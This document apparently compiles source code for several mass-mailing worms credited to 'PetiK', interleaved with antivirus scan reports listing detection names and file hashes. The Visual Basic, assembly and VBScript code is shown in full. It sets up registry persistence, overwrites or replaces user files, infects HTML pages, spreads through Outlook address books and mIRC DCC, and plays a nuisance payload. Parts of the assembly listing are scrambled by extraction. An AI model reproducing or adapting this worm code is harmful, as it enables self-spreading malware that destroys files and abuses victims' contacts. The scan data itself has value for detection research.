File ApiWord.doc received on 05.16.2009 10:45:11 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result Virus.MSWord.Petik.B!IK W97M/Apish W2000M/Droopy.A Virus/MSWord.Petik W97M/Apish.A MW97:Apish-A W97M/Droopy W97M.Petik.B W97M.Prilissa W97M.Petik.B Virus.MSWord.Petik.b W97M.Petik W97M.ApiWord W97M/Apish.A W97M/Apish.A Virus.MSWord.Petik.b W97M/Petik.B W97M.Petik.B Virus.MSWord.Petik.B Macro.Petik.b Virus.MSWord.Petik.b W97M/Generic@MM W97M/Generic@MM Macro.Droopy.A Virus:W97M/Petik.B W97M/Apish.A W97M/Amish.A W97M.Petik.B W97M/CokeBoy WORD.97.Petapwd.A Macro.Word.ApiWord WM97/Petik-B Virus.MSWord.Petik.b (v) W97M.Apish W2KM/Generico W97M_PETIK.B Virus.MSWord.Petik.b W97M.Apish.A WORD.97.Petapwd.A

Additional information File size: 37888 bytes MD5...: 0b6d3ba97c607d4c334e45fda1907912 SHA1..: 826552b0aa5837a1c4c205d8c980d103deaafc01

' Name : W32.HLLW.Visual ' Author : PetiK ' Language : Visual Basic ' Date : 19/05/2002 ' ' ' ' Attribute VB_Name = "Module1" Sub Main() On Error Resume Next Set fso = CreateObject("Scripting.FilesystemObject") Set ws = CreateObject("WScript.Shell") orig = App.Path & "\" & App.EXEName & ".exe" cop = fso.GetSpecialFolder(1) & "\kern32dll.exe" FileCopy orig, cop ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\kern32dll", cop fso.CreateFolder ("C:\Backup") ncopy = "" For I = 1 To 10 Randomize (Timer) ncopy = ncopy + Chr(Int(Rnd() * 26) + 97) Next I FileCopy orig, "C:\Backup\" & ncopy & ".exe" Call inf(ws.SpecialFolders("MyDocuments")) Set out = CreateObject("Outlook.Application") Set map = out.GetNameSpace("MAPI") If out = "Outlook" Then map.Logon "profile", "password" For y = 1 To map.AddressLists.Count Set z = map.AddressLists(y) x = 1 Set mel = out.CreateItem(0) For oo = 1 To z.AddressEntries.Count e = z.AddressEntries(x) ml.Recipients.Add e x = x + 1 If x < 250 Then oo = z.AddressEntries.Count Next oo mel.Subject = "New Visual Tool for U" mel.Body = "Look at this new tool by clicking on attached file." mel.Attachments.Add orig, 1, 1, "visual_tool.exe" mel.Send e = "" Next y map.Logoff End If If Day(Now) = 19 Then about.Visible = True End Sub Sub inf(folder) Set fso = CreateObject("Scripting.FilesystemObject") Set ws = CreateObject("WScript.Shell") orig = App.Path & "\" & App.EXEName & ".exe" Set dire = fso.GetFolder(folder) Set fc = dire.Files For Each f1 In fc ext = fso.GetExtensionName(f1.Path) ext = LCase(ext) oext = LCase(f1.Name) If (ext <> "vbs") Then If (Right(oext, 8) <> "old_.exe") Then 'MsgBox oext, vbInformation, Right(oext, 8) FileCopy orig, f1.Path & "old_.exe" End If End If Next End Sub

File Visual.exe received on 05.16.2009 19:47:59 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Backdoor.Win32.VB!IK Win32/Petvb.worm.9216 Worm/Petik.K Worm/Win32.Win32 W32/Malware!c440 Win32:Petik-C I-Worm/Petik Win32.Petik.K@mm I-Worm.Petik Worm.VB-874 Worm.Win32.Petik.VisTol WIN.WORM.Virus Win32.PetTick.dr Win32/Petticky.A W32/Malware!c440 Email-Worm.Win32.Petik W32/Petik.U@mm Win32.Petik.K@mm Backdoor.Win32.VB Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick.dr W32/PetTick.dr Worm.Petik.K Worm:Win32/Petick@mm Win32/Petik.VisTol W32/Petik.AQ Worm/W32.Petik.9216 W32/Petik.R.worm I-Worm.Petvtl.A Medium Risk Malware Trojan.Petik.a W32/Petik-U Email-Worm.Win32.Petik W32.Pet_Ticky.gen WORM_PETIK.A Email-Worm.Win32.Petik I-Worm.Win32.PetLil.A I-Worm.Petvtl.A

Additional information File size: 9216 bytes MD5...: b2ff3ada6672ac9266a6fac5842ae706 SHA1..: 93d70d8a36a4139f494fe82fb8d418104a72a899 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

' ' ' '

Name : W32.HLLW.Lili Author : PetiK Language : Visual Basic Date : 31/05/2002

Attribute VB_Name = "Module1" Private Declare Function WritePrivateProfileString& Lib "kernel32" Alias "WritePrivateProfileStringA" _ (ByVal lpszSection As String, ByVal lpszKey As String, _ ByVal lpszString As String, ByVal lpszFile As String) Sub Main() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Call CopyWorm Call inf(App.Path) Call inf(ws.SpecialFolders("MyDocuments")) Call inf(fso.GetSpecialFolder(0)) Call inf(fso.GetSpecialFolder(1)) Call inf(fso.GetSpecialFolder(2)) If Day(Now) = 1 Or Day(Now) = 15 Or Day(Now) = 31 Then xxxpic.Show 1 Else MsgBox "Sorry, no XXX pic today. Wait And See.", vbExclamation, "XXX Pic" End If End Sub Sub CopyWorm() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") orig = App.Path If Right(orig, 1) <> "\" Then orig = orig & "\" orig = orig & App.EXEName & ".exe" copywrm = fso.GetSpecialFolder(0) If Right(copywrm, 1) <> "\" Then copywrm = copywrm & "\" For I = 1 To 8 Randomize (Timer) ncopy = ncopy + Chr(Int(Rnd() * 26) + 97) Next I copywrm = copywrm & ncopy & ".exe" FileCopy orig, copywrm ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NewName", copywrm Call WritePrivateProfileString("rename", "NUL", orig, "WININIT.INI") FileCopy orig, "C:\XXXPic.exe" Set out = CreateObject("Outlook.Application") Set map = out.GetNameSpace("MAPI") If out = "Outlook" Then map.Logon "profile", "password" For y = 1 To map.AddressLists.Count Set z = map.AddressLists(y) x = 1 Set mel = out.CreateItem(0) For oo = 1 To z.AddressEntries.Count e = z.AddressEntries(x) ml.Recipients.Add e x = x + 1 If x < 250 Then oo = z.AddressEntries.Count Next oo mel.Subject = "XXX Picture..." mel.Body = "A pretty girl waits for you. Click on attached file..." mel.Attachments.Add "C:\XXXPic.exe" mel.Send e = "" Next y map.Logoff End If End Sub Sub inf(dir) On Error Resume Next orig = ""

orig = App.Path If Right(orig, 1) <> "\" Then orig = orig & "\" orig = orig & App.EXEName & ".exe" Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set pwoj = fso.GetFolder(dir) Set fc = pwoj.Files For Each f1 In fc ext = LCase(fso.GetExtensionName(f1.Path)) If (ext = "vbs") Or (ext = "htm") Or (ext = "doc") Or (ext = "xls") Or (ext = "bmp") _ Or (ext = "gif") Or (ext = "jpg") Or (ext = "pdf") Or (ext = "js") Then cpy = "" cpy = Left(f1.Path, Len(f1.Path) - 4) FileCopy orig, cpy & ".exe" reg = fso.GetBaseName(f1.Path) ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & reg, cpy & ".exe" End If Next End Sub

File Liliworm.exe received on 05.16.2009 17:43:19 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.737 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.52.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 Result Email-Worm.Win32.Lorm!IK Win32/PetLil.worm.37376 VBS/Gorum.XPic.2 Worm/Win32.Win32 W32/Petik.A@mm Win32:PetLil I-Worm/Lorm Win32.Petlil.B@mm I-Worm.Lorm Worm.Win32.Lorm.A Win32.HLLM.Generic.58 Win32.Lorm Win32/Petlil.A W32/Petik.A@mm Email-Worm.Win32.Lorm W32/Petik.A@mm Win32.Petlil.B@mm Email-Worm.Win32.Lorm Email-Worm.Win32.Lorm Email-Worm.Win32.Lorm W32/PetLil@MM W32/PetLil@MM Script.Gorum.XPic.2 Worm:Win32/PetLil@mm Win32/Lorm.A Pet_Tick.37376.A Worm/W32.Lorm.37376 W32/Petlil.A I-Worm.Petlil.A Medium Risk Malware Worm.Liliworm W32/Petlil-A W32.Pet_Ticky.B@mm W32.Pet_Ticky.B@mm W32/Lorm WORM_PETLIL.A Email-Worm.Win32.Lorm I-Worm.Win32.PetLil.B I-Worm.Petlil.A

Additional information File size: 37376 bytes MD5...: fce1de67fd47f4b6b67ab7eba0bf4246 SHA1..: bc50ef3b75ee04316ce9e24ba5707ba21ad308a1 PEiD..: UPX 2.90 [LZMA] -&gt; Markus Oberhumer, Laszlo Molnar &amp; John Reiser

comment * Name : I-Worm.Haram Author : PetiK Language : win32asm Date : May 13th 2002 - June 1st 2002 Size : 5192 bytes (compressed with Petite Tool) Comments : - Copy to %sysdir%\FunnyGame.exe - Search all doc files in "Personal" folder and create a new virus html file: example : document.doc -> document.htm 1) 2) 1) Good DOC file 2) Good HTM virus (1571 bytes) - Put the name of all active process and add .htm: example : process.exe -> process.exe.htm 3) 4) 3) Real name of active process 4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP) - Create a random name file in StarUp folder to spread with Outlook - On the 10th, payload : open and close CD door and display a messagebox in loop * .586p .model flat .code JUMPS include win32api.inc LF CR CRLF @pushsz equ equ equ 10 13 <13,10> macro local ifnb %out .err endif call db msg2psh, empty next_instr <empty> too much arguments in macro '@pushsz' next_instr msg2psh,0

next_instr: endm @endsz macro local nxtchr: lodsb test jnz macro a extrn a:proc call a struct dd 0 dd ?,? dd ?,? dd ?,? dd 0 dd 0 dd 0,0 db 260 dup(0) db 14 dup(0) nxtchr al,al nxtchr

endm api endm WIN32_FIND_DATA dwFileAttributes ftCreationTime ftLastAccessTime ftLastWriteTime nFileSizeHigh nFileSizeLow dwReserved0 cFileName cAlternateFileName

db WIN32_FIND_DATA

2

dup (0) ends DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? DWORD ? db 260 dup(?)

PROCESSENTRY32 STRUCT dwSize cntUsage th32ProcessID th32DefaultHeapID th32ModuleID cntThreads th32ParentProcessID pcPriClassBase dwFlags szExeFile PROCESSENTRY32 ENDS start: pushad @SEH_SetupFrame hide_the_worm: call hide_worm get_name: push mov push push api

<jmp end_worm>

50 esi,offset orgwrm esi 0 GetModuleFileNameA

get_copy_name: mov edi,offset cpywrm push edi push 50 push edi api GetSystemDirectoryA add edi,eax mov eax,'nuF\' stosd mov eax,'aGyn' stosd mov eax,'e.em' stosd mov eax,'ex' stosd pop edi copy_worm: push push push api test je 1 edi esi CopyFileA eax,eax ok_copy

push 50 push edi push 1 @pushsz "Haram" @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" push 80000002h api SHSetValueA push 50 push offset msgwrm push esi api GetFileTitleA push 10h push offset msgwrm @pushsz "ERROR : this file is not a valid Win32 file." push 0 api MessageBoxA ok_copy: call inf_doc_personal

get_startup_path: push 0 push 7

push push api push api call

offset startup 0 SHGetSpecialFolderPathA offset startup SetCurrentDirectoryA

cr_vbsname mov push push push push push push push api mov push push push push push api push api edi,offset vbsname 0 1 2 0 1 40000000h edi CreateFileA ebp,eax 0 offset byte_write e_vbs - s_vbs offset s_vbs ebp WriteFile ebp CloseHandle

payload: mov push api lea cmp jne

eax,offset sysTime eax GetSystemTime eax,sysTime word ptr [eax+6],10 end_payload

xor eax,eax push eax push eax push eax @pushsz "set CDAudio door open" api mciSendStringA push api 500 Sleep

xor eax,eax push eax push eax push eax @pushsz "set CDAudio door closed" api mciSendStringA push 40h @pushsz "I-Worm.Haram" @pushsz "Coded by PetiK - ©2002 - France" push 0 api MessageBoxA api push pop xor div inc mov push api jmp GetTickCount 10000 ecx edx,edx ecx edx ecx,edx ecx Sleep payload

end_payload: call inf_process

end_worm: @SEH_RemoveFrame popad

push api

0 ExitProcess

hide_worm Proc pushad @pushsz "KERNEL32.DLL" api GetModuleHandleA xchg eax,ecx jecxz end_hide_worm @pushsz "RegisterServiceProcess" push ecx api GetProcAddress xchg eax,ecx jecxz end_hide_worm push 1 push 0 call ecx end_hide_worm: popad ret hide_worm EndP Spread_Mirc Proc push offset cpywrm push offset mirc_exe api lstrcpy call @mirc db "C:\mirc\script.ini",0 db "C:\mirc32\script.ini",0 db "C:\progra~1\mirc\script.ini",0 db "C:\progra~1\mirc32\script.ini",0 @mirc: pop esi push 4 pop ecx mirc_loop: push ecx push 0 push 80h push 2 push 0 push 1 push 40000000h push esi api CreateFileA mov ebp,eax push 0 push offset byte_write @tmp_mirc: push e_mirc - s_mirc push offset s_mirc push ebp api WriteFile push ebp api CloseHandle @endsz pop ecx loop mirc_loop end_spread_mirc: ret Spread_Mirc EndP

; Registered as Service Process

; spread with mIRC. Thanx to Microsoft.

inf_doc_personal Proc pushad get_personal_folder: push 0 push 5 push offset personal push 0 api SHGetSpecialFolderPathA push offset personal api SetCurrentDirectoryA fff_doc: push offset ffile @pushsz "*.doc" api FindFirstFileA

inc je dec mov cr_file: push push api mov push api add sub mov lodsd push push push push push push push api mov push push push push push api push api

eax end_f_doc eax [hfind],eax offset ffile.cFileName offset new_file lstrcpy esi,offset new_file esi lstrlen esi,eax esi,4 [esi],"mth." 0 1 2 0 1 40000000h offset new_file CreateFileA ebp,eax 0 offset byte_write e_htm - s_htm offset s_htm ebp WriteFile ebp CloseHandle

; to become \SYSTEM\Wsock32

fnf_doc: push offset ffile push [hfind] api FindNextFileA test eax,eax jne cr_file push [hfind] api FindClose end_f_doc: popad ret inf_doc_personal EndP inf_process Proc popad create_folder: push 0 @pushsz "C:\backup" api CreateDirectoryA @pushsz "C:\backup" api SetCurrentDirectoryA enum_process: push 0 push 2 api CreateToolhelp32Snapshot mov lSnapshot,eax inc eax je end_inf_process lea eax,uProcess mov [eax.dwSize], SIZE PROCESSENTRY32 lea eax,uProcess push eax push lSnapshot api Process32First check_process: test eax,eax jz end_process push ecx mov eax,ProcessID push offset uProcess cmp eax,[uProcess.th32ProcessID] je NextProcess

lea

ebx,[uProcess.szExeFile]

push ebx push offset new_name api lstrcpy mov edi,offset new_name push edi api lstrlen add edi,eax mov eax,"mth." stosd xor eax,eax stosd push offset new_name @pushsz "System.htm" api lstrcmp test eax,eax jz NextProcess push push push push push push push api mov push push push push push api push api 0 1 2 0 1 40000000h offset new_name CreateFileA ebp,eax 0 offset byte_write e_htm - s_htm offset s_htm ebp WriteFile ebp CloseHandle

NextProcess: push offset uProcess push lSnapshot api Process32Next jmp check_process end_process: push lSnapshot api CloseHandle end_inf_process: pushad ret inf_process EndP cr_vbsname Proc mov edi,offset vbsname ; api GetTickCount push 10 pop ecx ; xor edx,edx ; div ecx ; inc edx ; mov ecx,edx name_g: push ecx api GetTickCount push '9'-'0' pop ecx xor edx,edx div ecx xchg eax,edx add al,'0' stosb api GetTickCount push 100 pop ecx xor edx,edx div ecx push edx api Sleep pop ecx

loop name_g mov eax,"sbv." stosd ret cr_vbsname EndP

.data ffile WIN32_FIND_DATA <?> sysTime db 16 dup(0) uProcess ProcessID lSnapshot new_name orgwrm cpywrm msgwrm startup personal new_file vbsname byte_write hfind s_mirc: db db db db mirc_exe db e_mirc: s_htm: db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db PROCESSENTRY32 <?> dd ? dd ? db 100 dup (?) db 50 dup db 50 dup db 50 dup db 70 dup db 70 dup (0) db 90 dup (0) db 20 dup dd ? dd ? (0) (0) (0) (0) (0)

db "[script]",CRLF ";Don't edit this file.",CRLF,CRLF "n0=on 1:JOIN:{",CRLF "n1= /if ( $nick == $me ) { halt }",CRLF "n2= /.dcc send $nick " db 50 dup (?) CRLF,"n3=}",0

db '<haram>',CRLF '<html><head><title>Windows Media Player</title></head><body>',CRLF '<script language=VBScript>',CRLF 'On Error Resume Next',CRLF 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF 'If err.number=429 Then',CRLF 'kupfkvqg.Run javascript:location.reload()',CRLF 'Else',CRLF,CRLF 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF 'End If',CRLF,CRLF 'Function glvqglvb(dir)',CRLF 'If upfkupfk.FolderExists(dir) Then',CRLF ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF ' Set bbblvqgl=bbbbbbbb.Files',CRLF ' For each lvqgvqgl in bbblvqgl',CRLF ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF ' rhmwrrhm.Close()',CRLF ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF ' htmorg=rhmwrrhm.ReadAll()',CRLF ' rhmwrrhm.Close()',CRLF ' Set mwrrhmwr=document.body.createTextRange',CRLF ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF ' rhmwrrhm.WriteLine "<haram>"',CRLF ' rhmwrrhm.Write(htmorg)',CRLF ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF ' rhmwrrhm.Close()',CRLF ' Else',CRLF ' rhmwrrhm.Close()',CRLF ' End If',CRLF ' End If',CRLF ' Next',CRLF

db 'End If',CRLF db 'End Function',CRLF db '</script></body></html>',0 e_htm: s_vbs: db 'On Error Resume Next',CRLF db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF db 'Set sys = terqne.GetSpecialFolder(1)',CRLF db 'copyname = sys&"\FunnyGame.exe"',CRLF db 'Set htgx = CreateObject("Outlook.Application")',CRLF db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF db 'For each c In ofcc.AddressLists',CRLF db 'If c.AddressEntries.Count <> 0 Then',CRLF db 'For d = 1 To c.AddressEntries.Count',CRLF db 'Set etldb = htgx.CreateItem(0)',CRLF db 'etldb.To = c.AddressEntries(d).Address',CRLF db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF db 'etldb.Attachments.Add(copyname)',CRLF db 'etldb.DeleteAfterSubmit = True',CRLF db 'If etldb.To <> "" Then',CRLF db 'etldb.Send',CRLF db 'End If',CRLF db 'Next',CRLF db 'End If',CRLF db 'Next',0 e_vbs: ends end start

HARAM.HTM <haram> <html><head><title>Windows Media Player</title></head><body> <script language=VBScript> On Error Resume Next MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer" Set upfkupfk=CreateObject("Scripting.FileSystemObject") Set kupfkvqg=CreateObject("WScript.Shell") If err.number=429 Then kupfkvqg.Run javascript:location.reload() Else glvqglvb(upfkupfk.GetSpecialFolder(0)) glvqglvb(upfkupfk.GetSpecialFolder(1)) glvqglvb(kupfkvqg.SpecialFolders("MyDocuments")) glvqglvb(kupfkvqg.SpecialFolders("Desktop")) glvqglvb(kupfkvqg.SpecialFolders("Favorites")) glvqglvb(kupfkvqg.SpecialFolders("Fonts")) End If Function glvqglvb(dir) If upfkupfk.FolderExists(dir) Then Set bbbbbbbb=upfkupfk.GetFolder(dir) Set bbblvqgl=bbbbbbbb.Files For each lvqgvqgl in bbblvqgl lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name)) If lvqglvqr="htm" or lvqglvqr="html" Then Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False) if rhmwrrhm.ReadLine <> "<haram>" Then rhmwrrhm.Close() Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False) htmorg=rhmwrrhm.ReadAll() rhmwrrhm.Close() Set mwrrhmwr=document.body.createTextRange Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False) rhmwrrhm.WriteLine "<haram>" rhmwrrhm.Write(htmorg) rhmwrrhm.WriteLine mwrrhmwr.htmltext rhmwrrhm.Close() Else rhmwrrhm.Close() End If End If Next End If End Function </script></body></html> HARAM.VBS On Error Resume Next Set terqne = CreateObject("Scripting.FileSystemObject") Set qumhzh = CreateObject("WScript.Shell") Set sys = terqne.GetSpecialFolder(1) copyname = sys&"\FunnyGame.exe" Set htgx = CreateObject("Outlook.Application") Set ofcc = htgx.GetNameSpace("MAPI") For each c In ofcc.AddressLists If c.AddressEntries.Count <> 0 Then For d = 1 To c.AddressEntries.Count Set etldb = htgx.CreateItem(0) etldb.To = c.AddressEntries(d).Address etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name etldb.Body = "Play at this funny game. It's very cool !" etldb.Attachments.Add(copyname) etldb.DeleteAfterSubmit = True If etldb.To <> "" Then etldb.Send End If Next End If Next

File Haram.exe received Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster

on 05.16.2009 11:58:29 (CET) Version Last Update 4.0.0.101 2009.05.16 5.0.0.2 2009.05.15 7.9.0.168 2009.05.15 2.0.3.1 2009.05.15 5.1.2.4 2009.05.15 4.8.1335.0 2009.05.15 8.5.0.336 2009.05.15 7.2 2009.05.16 10.00 2009.05.15 0.94.1 2009.05.15 1157 2009.05.08 5.0.0.12182 2009.05.16 7.0.17.0 2009.05.14 31.6.6508 2009.05.16 4.4.4.56 2009.05.15 8.0.14470.0 2009.05.15 3.117.0.0 2009.05.16 19 2009.05.16 T3.1.1.49.0 2009.05.16 7.10.735 2009.05.14 7.0.0.125 2009.05.16 5616 2009.05.15 5616 2009.05.15 6.7.6 2009.05.15 1.4602 2009.05.16 4080 2009.05.15 6.01.05 2009.05.16 2009.1.8.0 2009.05.16 10.0.0.14 2009.05.16 4.4.2.0 2009.05.15 3.0 2009.05.16 21.29.52.00 2009.05.16 4.41.0 2009.05.16 3.2.1858.2 2009.05.16 1.4.4.12 2009.05.16 6.3.4.1.326 2009.05.15 8.950.0.1092 2009.05.15 3.12.10.5 2009.05.16 2009.5.15.1737 2009.05.15 4.6.5.0 2009.05.15

Result VBS.Lee.Based!IK Win32/PetTick.worm.5192 TR/Navigator.VBS Worm/Win32.Win32 W32/Malware!f42c Win32:Trojan-gen {Other} I-Worm/Petik Generic.Malware.SIMbg.1C80A513 I-Worm.Petik Worm.Funnygame Worm.Win32.Petik.Haram Win32.Petik.7680 Suspicious File VBS/Rophage.B W32/Malware!f42c Email-Worm.Win32.Petik W32/Petik!worm Generic.Malware.SIMbg.1C80A513 VBS.Lee.Based Email-Worm.Win32.Petik Email-Worm.Win32.Petik W32/PetTick@MM Artemis!722436AE8486 Trojan.Navigator.VBS Worm:Win32/PetTick.H@mm Win32/Petik.Haram W32/Petik.AD W32/Petik.W.worm I-Worm.Pethar.A Worm.Mail.Win32.Petik W32/Petik-Y Email-Worm.Win32.Petik W95.Pet_Tick.gen Email-Worm.Win32.Petik I-Worm.Win32.Petik.5192 I-Worm.Pethar.A

Additional information File size: 5192 bytes MD5...: 722436ae848608575bdf5d7036f3d1a9 SHA1..: ca97b2f3ef477f327875b1373f14a34b88b565c6 PEiD..: PEtite v2.2

File Haram.htm received on 05.16.2009 11:58:32 (CET) Antivirus Version Last Update a-squared 4.0.0.101 2009.05.16 AhnLab-V3 5.0.0.2 2009.05.15 AntiVir 7.9.0.168 2009.05.15 Antiy-AVL 2.0.3.1 2009.05.15 Authentium 5.1.2.4 2009.05.15 Avast 4.8.1335.0 2009.05.15 AVG 8.5.0.336 2009.05.15 BitDefender 7.2 2009.05.16 CAT-QuickHeal 10.00 2009.05.15 ClamAV 0.94.1 2009.05.15 Comodo 1157 2009.05.08 DrWeb 5.0.0.12182 2009.05.16 eSafe 7.0.17.0 2009.05.14 eTrust-Vet 31.6.6508 2009.05.16 F-Prot 4.4.4.56 2009.05.15 F-Secure 8.0.14470.0 2009.05.15 Fortinet 3.117.0.0 2009.05.16 GData 19 2009.05.16 Ikarus T3.1.1.49.0 2009.05.16 K7AntiVirus 7.10.735 2009.05.14 Kaspersky 7.0.0.125 2009.05.16 McAfee 5616 2009.05.15 McAfee+Artemis 5616 2009.05.15 McAfee-GW-Edition 6.7.6 2009.05.15 Microsoft 1.4602 2009.05.16 NOD32 4080 2009.05.15 Norman 6.01.05 2009.05.16 nProtect 2009.1.8.0 2009.05.16 Panda 10.0.0.14 2009.05.16 PCTools 4.4.2.0 2009.05.15 Prevx 3.0 2009.05.16 Rising 21.29.52.00 2009.05.16 Sophos 4.41.0 2009.05.16 Sunbelt 3.2.1858.2 2009.05.16 Symantec 1.4.4.12 2009.05.16 TheHacker 6.3.4.1.326 2009.05.15 TrendMicro 